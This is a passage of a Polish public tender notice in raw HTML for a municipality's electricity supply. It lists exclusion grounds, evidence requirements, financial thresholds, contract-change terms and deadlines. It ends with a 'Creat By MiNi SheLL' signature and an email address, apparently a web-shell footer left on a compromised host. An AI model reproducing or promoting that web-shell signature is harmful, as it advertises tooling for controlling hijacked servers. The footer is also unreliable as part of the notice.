9 ust. 1 i 3 lub art. 10 ustawy z dnia 15 czerwca 2012r. o skutkach<br/>powierzania wykonywania pracy cudzoziemcom przebywającym wbrew przepisom na terytorium<br/>Rzeczypospolitej Polskiej (art. 108 ust. 1 pkt 1 lit. h Pzp);<br/>- lub za odpowiedni czyn zabroniony określony w przepisach prawa obcego<br/>2) jeżeli urzędującego członka jego organu zarządzającego lub nadzorczego, wspólnika spółki w<br/>spółce jawnej lub partnerskiej albo komplementariusza w spółce komandytowej lub<br/>komandytowo-akcyjnej lub prokurenta prawomocnie skazano za przestępstwo, o którym mowa<br/>w pkt 1 (art. 108 ust. 1 pkt 2 Pzp);<br/>3) wobec którego wydano prawomocny wyrok sądu lub ostateczną decyzję administracyjną o<br/>zaleganiu z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub<br/>zdrowotne, chyba że wykonawca odpowiednio przed upływem terminu do składania wniosków o<br/>dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert dokonał<br/>płatności należnych podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne<br/>wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłaty tych<br/>należności (art. 108 ust. 1 pkt 3 Pzp);<br/>4) wobec którego prawomocnie orzeczono zakaz ubiegania się o zamówienia publiczne (art. 108<br/>ust. 1 pkt 4 Pzp);<br/>5) jeżeli zamawiający może stwierdzić, na podstawie wiarygodnych przesłanek, że Wykonawca<br/>zawarł z innymi Wykonawcami porozumienie mające na celu zakłócenie konkurencji, w<br/>szczególności jeżeli należąc do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16<br/>lutego 2007 r. o ochronie konkurencji i konsumentów, złożyli odrębne oferty, oferty częściowe<br/>lub wnioski o dopuszczenie do udziału w postępowaniu, chyba że wykażą, że przygotowali te<br/>oferty lub wnioski niezależnie od siebie (art. 108 ust. 1 pkt 5 Pzp);<br/>6) jeżeli, w przypadkach, o których mowa w art. 85 ust. 1, Pzp doszło do zakłócenia konkurencji<br/>wynikającego z wcześniejszego zaangażowania tego wykonawcy lub podmiotu, który należy z<br/>wykonawcą do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. oochronie konkurencji i konsumentów, chyba że spowodowane tym zakłócenie konkurencji może<br/>być wyeliminowane w inny sposób niż przez wykluczenie wykonawcy z udziału w postępowaniu<br/>o udzielenie zamówienia (art. 108 ust. 1 <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe żądane w celu potwierdzenia braku podstaw wykluczenia (składane<br/>na wezwanie Zamawiającego w terminie, nie krótszym niż 5 dni od dnia wezwania). W celu<br/>potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie<br/>zamówienia publicznego, zamawiający żąda Oświadczenia o aktualności informacji zawartych w<br/>oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez Zamawiającego wg wzoru stanowiącego Załącznik nr 6 do SWZ (dotyczy Część 1 i<br/>Część 2 zamówienia).<br/>5. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp<br/>dane umożliwiające dostęp do tych środków.<br/>6. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.<br/>7. Jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu, polega na<br/>zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów<br/>udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków<br/>prawnych:<br/>1) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, musi<br/>udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych<br/>podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający tę okoliczność;<br/>2) Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby<br/>zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na<br/>wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w art.<br/>112 ust. 2 pkt 3 i 4 Pzp, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia,<br/>które zostały przewidziane względem Wykonawcy;<br/>3) podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z Wykonawcą, który<br/>polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez Zamawiającego<br/>powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten<br/>nie ponosi winy;<br/>4) jeżeli zdolności techniczne lub zawodowe, sytuacja finansowa lub ekonomiczna podmiotu<br/>udostępniającego zasoby nie potwierdzają spełniania przez wykonawcę warunków udziału w<br/>postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby<br/>Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub<br/>podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu;<br/>5) w celu oceny, czy Wykonawca polegając na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie<br/>zamówienia publicznego oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje<br/>rzeczywisty dostęp do ich zasobów, a także w celu wykazania braku wobec tych podmiotów podstaw<br/>do wykluczenia oraz spełniania, w zakresie w jakim powołuje się na ich zasoby, warunków udziału w<br/>postępowaniu, Wykonawca:<br/>a) składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji zamówienia lub inny środek dowodowy potwierdzający, że<br/>wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami podmiotów,<br/>b) składa wraz z ofertą Oświadczenie</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe (na wezwanie zamawiającego) żądane w<br/>celu potwierdzenia spełniania warunków udziału w postępowaniu składane w terminie nie krótszym niż<br/>5 dni od dnia wezwania (dotyczy Część 1 i Część 2 zamówienia):<br/>1) W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu w zakresie<br/>uprawnień do prowadzenia działalności gospodarczej zamawiający żąda ważnej Koncesji w zakresie<br/>obrotu energią elektryczną wydanej przez Prezesa Urzędu Regulacji Energetyki<br/>2) W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących<br/>sytuacji ekonomicznej lub finansowej zamawiający żąda złożenia informacji banku lub spółdzielczej<br/>kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub<br/>zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem w<br/>wysokości nie mniejszej niż:<br/>a) 250.000,00 zł (dwieście pięćdziesiąt tysięcy) w przypadku składania oferty na Część 1 zamówienia<br/>b) 150.000,00 zł (sto pięćdziesiąt tysięcy) w przypadku składania oferty na Część 2 zamówienia<br/>c) 400.000,00 zł (czterysta tysięcy) w przypadku składania oferty na dwie części zamówienia.<br/>3) W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących<br/>zdolności technicznej lub zawodowej Zamawiający żąda złożenia wykazu dostaw wykonanych, a w<br/>przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3<br/>lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem przedmiotu,<br/>dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane wraz z<br/>dowodami określającymi czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są<br/>wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych<br/>nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie<br/>powinny być wydane w okresie ostatnich 3 miesięcy. Wzór wykazu stanowi Załącznik nr 7 do SWZ.<br/>Okres wyrażony w latach liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw wykonywanych wspólnie z<br/>innymi Wykonawcami, przedkładany wykaz dostaw dotyczyć musi dostaw, w których wykonaniu<br/>Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych,<br/>w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>4. Podmiotowe środki dowodowe żądane w celu potwierdzenia braku podstaw wykluczenia (składane<br/>na wezwanie Zamawiającego w terminie, nie krótszym niż 5 dni od dnia wezwania). W celu<br/>potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie<br/>zamówienia publicznego, zamawiający żąda Oświadczenia o aktualności informacji zawartych w<br/>oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez Zamawiającego wg wzoru stanowiącego Załącznik nr 6 do SWZ (dotyczy Część 1 i<br/>Część 2 zamówienia).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie przewiduje składania przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień<br/>dotyczących treści złożonych ofert oraz innych składanych dokumentów lub oświadczeń. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) Zmiany jednostkowej stawki i lub ceny za 1 MWh wyłącznie w przypadku:<br/>a) ustawowej zmiany stawki podatku VAT i/lub<br/>b) ustawowej zmiany opodatkowania energii elektrycznej podatkiem akcyzowym<br/>c) zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust.3-<br/>5 ustawy z dnia 10.10.2002r. o minimalnym wynagrodzeniu za pracę<br/>d) zmiany zasad podleganiu ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lubwysokości stawki składki na ubezpieczenia społeczne i zdrowotne<br/>e) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o<br/>których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych<br/>wyłącznie o kwotę wynikającą ze zmiany tych stawek<br/>Zmiany, o których mowa w pkt 1) litera a i b obowiązywać będą od dnia wejścia w życie<br/>stosownych przepisów i nie wymagają zmiany Umowy (Aneksu).<br/>Zmiany, o których mowa w pkt 1) litera c, d i e obowiązywać będą od dnia zawarcia przez Strony<br/>stosownego Aneksu. Warunkiem przystąpienia przez Zamawiającego do aneksu jest<br/>udokumentowanie przez Wykonawcę wpływu przedmiotowych zmian na koszty wykonania<br/>przedmiotu niniejszej umowy, w szczególności Wykonawca zobowiązany jest przedłożyć<br/>Zamawiającemu dokumenty wskazujące na wzrost wynagrodzeń (w wyniku przedmiotowych<br/>zmian) osób biorących bezpośredni udział w realizacji zamówienia oraz wykazać wpływ wzrostu<br/>kosztów wynagrodzeń na wzrost kosztów realizacji niniejszej umowy).<br/>2) Zmiany ilości punktów poboru energii wskazanych w Załączniku nr 1 do Umowy, przy czym<br/>zmiana ilości punktów poboru energii elektrycznej wynikać może np. z włączenia punktów<br/>poboru, z likwidacji punktu poboru z eksploatacji w okresie trwania Umowy lub zmiany stanu<br/>prawnego punktu poboru (w tym przejęcia), zmiany w zakresie Odbiorcy, zaistnienia przeszkód<br/>prawnych i formalnych uniemożliwiających przeprowadzenie procedury zmiany sprzedawcy, w<br/>tym w przypadku zaistnienia przeszkód uniemożliwiających rozwiązanie dotychczas<br/>obowiązujących umów. Przy czym zwiększenie ilości punktów poboru możliwe jest jedynie w<br/>obrębie grup taryfowych, które zostały ujęte w SWZ, zwiększenie ilości punktów poboru nie<br/>może spowodować zwiększenia ilości poboru energii elektrycznej o ponad 10% wolumenu<br/>szacowanego (§5 Umowy).<br/>3) Zmiany grup taryfowych, przy czym zmiana grupy taryfowej możliwa jest jedynie w obrębie<br/>grup taryfowych, które zostały ujęte w SWZ.<br/>4) Zmiany terminu rozpoczęcia dostaw energii elektrycznej do poszczególnych punktów poboru,<br/>jeżeli zmiana ta wynika z okoliczności niezależnych od Stron.<br/>5) Zmiany łącznego wynagrodzenie brutto Wykonawcy określonego w §11 ust.2 umowy, o ile<br/>zajdą okoliczności (łącznie lub rozdzielnie) opisane w pkt 1), 2) niniejszego paragrafu.<br/>6) Zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie<br/>treści Umowy do aktualnego stanu prawnego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-16 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ePUAP URZĄD GMINY LEGNICKIE: (/0x9ekme31w/skrytka)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-16 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com